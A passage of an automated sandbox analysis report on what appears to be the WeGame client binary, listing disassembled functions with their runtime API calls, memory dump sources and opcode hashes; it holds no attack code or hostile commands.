                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 0046232D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?find_component@?get_comp_mgr_instance@common@ierd_tgp@@?get_log_instance@base@@Component@common@ierd_tgp@@@std@@Component_mgr@12@Component_mgr@common@ierd_tgp@@H_prolog3H_prolog3_Logger@1@SimpleString::operator=V?$weak_ptr@Vcomponent_interface_type@23@@
                                                                • String ID: [main]query g_ComNetBar failed$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 1370719927-2189767750
                                                                • Opcode ID: 6ee55594ebaa18aa6719b982faec77be26f942a98f6a93cfb8c211927ccd39c7
                                                                • Instruction ID: 967abd53f6e70246a9151380aa4e0288bc7a56215d7ca662635c563c278ca3fd
                                                                • Opcode Fuzzy Hash: 6ee55594ebaa18aa6719b982faec77be26f942a98f6a93cfb8c211927ccd39c7
                                                                • Instruction Fuzzy Hash: 00218631D05609AADB10EFA5C492ADEBBB4AF18304F64405EE414BB382DB7C5E45CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00448AF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(TenFact.dll), ref: 00448B0F
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 00448B27
                                                                  • Part of subcall function 00448B8E: memset.VCRUNTIME140(?,00000000,00000208,?,?,?,00000104), ref: 00448BCF
                                                                • memset.VCRUNTIME140(?,00000000,00000208,?,?,00000104), ref: 00448B52
                                                                  • Part of subcall function 00448D44: memset.VCRUNTIME140(?,00000000,00000208,?,?,00000104), ref: 00448D70
                                                                • LoadLibraryW.KERNEL32(?,?,?,00000104,?,?,00000104), ref: 00448B77
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$HandleLibraryLoadModule
                                                                • String ID: TenFact.dll
                                                                • API String ID: 118576328-3270610849
                                                                • Opcode ID: e9885ec3c9c9dc75fdd6d0e9dc93c10e43d88fbaf5ca6e4cc18d422f19f274f4
                                                                • Instruction ID: e2168cdeb4e8de6ba0010cd4c1f6e575bdf6046f04e6787e6fd6cf5319d6633e
                                                                • Opcode Fuzzy Hash: e9885ec3c9c9dc75fdd6d0e9dc93c10e43d88fbaf5ca6e4cc18d422f19f274f4
                                                                • Instruction Fuzzy Hash: 6101DBF1E0021CABDB10EB61DC45EDF777CDB54714F00407AF909D3141DA74AE4486A9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040CCD0 Relevance: 7.6, APIs: 5, Instructions: 140COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • memmove.VCRUNTIME140(00000000,?,?,?), ref: 0040CDAE
                                                                • memmove.VCRUNTIME140(?,?,?,00000000,?,?,?), ref: 0040CDBC
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 0040CE07
                                                                • memmove.VCRUNTIME140(00000000,?,?,?), ref: 0040CE0F
                                                                • memmove.VCRUNTIME140(?,?,?,00000000,?,?,?), ref: 0040CE1B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 2580228974-0
                                                                • Opcode ID: 787b6c3063f94cecf2d4a1c3ef1f4272d9f4903e8e79dca3ede8bfe775034dfd
                                                                • Instruction ID: f8ea38dd0b494531f686fef03280e553818120a66b6cd39b568dde0a114c868d
                                                                • Opcode Fuzzy Hash: 787b6c3063f94cecf2d4a1c3ef1f4272d9f4903e8e79dca3ede8bfe775034dfd
                                                                • Instruction Fuzzy Hash: EE41D272A00108DFCB14DF68D88189E7BA5EF89314B21077FF815EB291EA34E9518BD6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046AC05 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046AC2F
                                                                • ?_Pninc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEPA_WXZ.MSVCP140 ref: 0046AC54
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?pptr@?$basic_streambuf@D@std@@@std@@Pninc@?$basic_streambuf@_U?$char_traits@U?$char_traits@_W@std@@@std@@
                                                                • String ID:
                                                                • API String ID: 3900108780-0
                                                                • Opcode ID: 29d2af33c128d9fd550ecb7634a3e7ddf0dabe5b0ad389d093f9baf1002a4484
                                                                • Instruction ID: 61f0fda4fddf025674b36bba42c54de2ba5996ec2ed1d396d5b3e9480d6cc709
                                                                • Opcode Fuzzy Hash: 29d2af33c128d9fd550ecb7634a3e7ddf0dabe5b0ad389d093f9baf1002a4484
                                                                • Instruction Fuzzy Hash: A1419475A00A06EFC715DF2CC4845A9BBF1FF49314B15816AE905A7B50EB34ED60CF89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00410AD0 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000), ref: 00410B03
                                                                • GetFileAttributesExW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00410B4C
                                                                • _wrmdir.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?,?,?,?,?,?,?,?,?,?), ref: 00410B6C
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00410BD7
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile_invalid_parameter_noinfo_noreturn_waccess_wrmdir
                                                                • String ID:
                                                                • API String ID: 2283794684-0
                                                                • Opcode ID: d0a39d18cabc653a7a71fca42115314f8f4771884829b125f7586ceb45877b6f
                                                                • Instruction ID: 6ed8446aa5e37d2c6d336e6f56b93559b5f36098a9c574b6d0b005bc18fa01b8
                                                                • Opcode Fuzzy Hash: d0a39d18cabc653a7a71fca42115314f8f4771884829b125f7586ceb45877b6f
                                                                • Instruction Fuzzy Hash: 51317C716182449FD700CF69D845B9BBBE8AF89309F10892EF898C2250E778E1C9CB56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046C277 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0046C281
                                                                  • Part of subcall function 004591E7: __EH_prolog3.LIBCMT ref: 004591EE
                                                                  • Part of subcall function 004591E7: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 00459212
                                                                  • Part of subcall function 004591E7: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 0045922B
                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,00000000,00000003,00000001,000000B0,0045448F,?,?,0000003C,?,0049C138,004A6870,004A6988,0000003C,?,0049C138), ref: 0046C2A9
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C2B8
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0046C2F7
                                                                  • Part of subcall function 00450FE5: __EH_prolog3_catch.LIBCMT ref: 00450FEC
                                                                  • Part of subcall function 00450FE5: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP140(?,0000004C,0046C243,?,?), ref: 0045101F
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 00451052
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 00451086
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 0045109C
                                                                  • Part of subcall function 00450FE5: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140 ref: 004510D4
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,0000004C,0046C243,?,?), ref: 0045115B
                                                                  • Part of subcall function 00450FE5: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 00451173
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C2DC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??6?$basic_ostream@?getloc@ios_base@std@@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@D@std@@@1@@H_prolog3_catchV01@_V?$basic_streambuf@Vlocale@2@
                                                                • String ID:
                                                                • API String ID: 2548761292-0
                                                                • Opcode ID: de09c73ff3b6d935ab6934a9aaf55b0f1ccd0b4eaa3a166544fe34baf6a5e657
                                                                • Instruction ID: cae9425795a12015c4889e72a18b87c51518d90af1a2d0492e8f394b898c6482
                                                                • Opcode Fuzzy Hash: de09c73ff3b6d935ab6934a9aaf55b0f1ccd0b4eaa3a166544fe34baf6a5e657
                                                                • Instruction Fuzzy Hash: 61015238A00205DFDB04EFA5C895FAD77B1EF04318F148099A956972A2DF389E49DB1D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046C1EC Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0046C1F6
                                                                  • Part of subcall function 004591E7: __EH_prolog3.LIBCMT ref: 004591EE
                                                                  • Part of subcall function 004591E7: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 00459212
                                                                  • Part of subcall function 004591E7: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 0045922B
                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@H@Z.MSVCP140(?,00000003,00000001,000000B0,004543EB,?,?,0000003C,?,0049C138,004A6988,004A6870), ref: 0046C21B
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C22A
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0046C269
                                                                  • Part of subcall function 00450FE5: __EH_prolog3_catch.LIBCMT ref: 00450FEC
                                                                  • Part of subcall function 00450FE5: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP140(?,0000004C,0046C243,?,?), ref: 0045101F
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 00451052
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 00451086
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 0045109C
                                                                  • Part of subcall function 00450FE5: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140 ref: 004510D4
                                                                  • Part of subcall function 00450FE5: ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,0000004C,0046C243,?,?), ref: 0045115B
                                                                  • Part of subcall function 00450FE5: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 00451173
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C24E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??6?$basic_ostream@?getloc@ios_base@std@@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@D@std@@@1@@H_prolog3_catchV01@V?$basic_streambuf@Vlocale@2@
                                                                • String ID:
                                                                • API String ID: 1469493847-0
                                                                • Opcode ID: ed23b2f09b6b38e7b2bec27c3c56e2d818ec978733fe0acae35aeb985d525ff4
                                                                • Instruction ID: 00270e2afbcdbf51e85c42b35f8b9fe1804c2440346ea68d388b973ebdc051d5
                                                                • Opcode Fuzzy Hash: ed23b2f09b6b38e7b2bec27c3c56e2d818ec978733fe0acae35aeb985d525ff4
                                                                • Instruction Fuzzy Hash: 00017534A00205DFDB04EFA5C895BAD77B1EF44315F04809DE456972A2DF389E49DB19
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046C305 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0046C30F
                                                                  • Part of subcall function 00459268: __EH_prolog3.LIBCMT ref: 0045926F
                                                                  • Part of subcall function 00459268: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP140(00000008,0046C325,00000003,00000001,000000B0,00454536,?,?,0000003C,004A6978,0049C138,004A6978,004A6988,0000003C,?,0049C138), ref: 00459293
                                                                  • Part of subcall function 00459268: ??0?$basic_iostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@@Z.MSVCP140(?,00000000,00000008,0046C325,00000003,00000001,000000B0,00454536,?,?,0000003C,004A6978,0049C138,004A6978,004A6988,0000003C), ref: 004592AC
                                                                • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@K@Z.MSVCP140(?,00000003,00000001,000000B0,00454536,?,?,0000003C,004A6978,0049C138,004A6978,004A6988,0000003C,?,0049C138,004A6870), ref: 0046C334
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C343
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0046C382
                                                                  • Part of subcall function 0045119A: __EH_prolog3_catch.LIBCMT ref: 004511A1
                                                                  • Part of subcall function 0045119A: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP140(?,?,00000000,00000048,0046C35C,?,?), ref: 004511D4
                                                                  • Part of subcall function 0045119A: ?width@ios_base@std@@QBE_JXZ.MSVCP140(00000000), ref: 00451207
                                                                  • Part of subcall function 0045119A: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 00451239
                                                                  • Part of subcall function 0045119A: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 0045124F
                                                                  • Part of subcall function 0045119A: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP140 ref: 0045128A
                                                                  • Part of subcall function 0045119A: ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,?,00000000,00000048,0046C35C,?,?), ref: 00451319
                                                                  • Part of subcall function 0045119A: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 00451331
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C367
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@_$?width@ios_base@std@@W@std@@@std@@$Bios_base@std@@D@std@@@std@@H_prolog3U?$char_traits@$??0?$basic_ios@_??0?$basic_iostream@_??1?$basic_ios@??6?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@_H_prolog3_catchV01@V?$basic_streambuf@_Vlocale@2@W@std@@@1@@
                                                                • String ID:
                                                                • API String ID: 3452098428-0
                                                                • Opcode ID: 1511ceae0b6eedb7a20a7b164cf126655309550d3141aef5667f8a78f78aea62
                                                                • Instruction ID: b30d05faa3e890484ebf660b11c771a8e2e24078c2a48cbb4e070d7745b1584f
                                                                • Opcode Fuzzy Hash: 1511ceae0b6eedb7a20a7b164cf126655309550d3141aef5667f8a78f78aea62
                                                                • Instruction Fuzzy Hash: FD014034604204DFDB04EF65C895BA977B1EF05315F00C499A85A972A2DF389A49DB19
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046C0DA Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0046C0E4
                                                                  • Part of subcall function 004591E7: __EH_prolog3.LIBCMT ref: 004591EE
                                                                  • Part of subcall function 004591E7: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 00459212
                                                                  • Part of subcall function 004591E7: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 0045922B
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140(00000003,00000001,000000B0,00454379,?,00000000), ref: 0046C118
                                                                • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z.MSVCP140(?), ref: 0046C12B
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C13A
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0046C155
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??5?$basic_istream@D@std@@@1@@V01@V?$basic_streambuf@
                                                                • String ID:
                                                                • API String ID: 288696274-0
                                                                • Opcode ID: 7d6a9eaa57393634ad6848c67a140523b8f5ee7e8795cbaad3f072c203e43bae
                                                                • Instruction ID: 1ff06c5b8036cb0966f1fb4e78622a61cc55a113a9a796d3c81b49b5186b7bfa
                                                                • Opcode Fuzzy Hash: 7d6a9eaa57393634ad6848c67a140523b8f5ee7e8795cbaad3f072c203e43bae
                                                                • Instruction Fuzzy Hash: BD015E34A00208DFDB04EFA5D895BAD7771EF05318F1480A9A456972A2DF389E49DB19
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046C163 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0046C16D
                                                                  • Part of subcall function 004591E7: __EH_prolog3.LIBCMT ref: 004591EE
                                                                  • Part of subcall function 004591E7: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 00459212
                                                                  • Part of subcall function 004591E7: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,0046C0FA,00000003,00000001,000000B0,00454379,?,00000000), ref: 0045922B
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140(00000003,00000001,000000B0,004545BA,004A6988,004A6988,004A6870,004A6988,0000003C,?,0049C138,004A6988), ref: 0046C1A1
                                                                • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AA_K@Z.MSVCP140(?), ref: 0046C1B4
                                                                • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 0046C1C3
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0046C1DE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??5?$basic_istream@D@std@@@1@@V01@V?$basic_streambuf@
                                                                • String ID:
                                                                • API String ID: 288696274-0
                                                                • Opcode ID: 10f82e3c39b7d8422185b3dac310fd4f0bbb42750b5ef967f64d09a1c7787b33
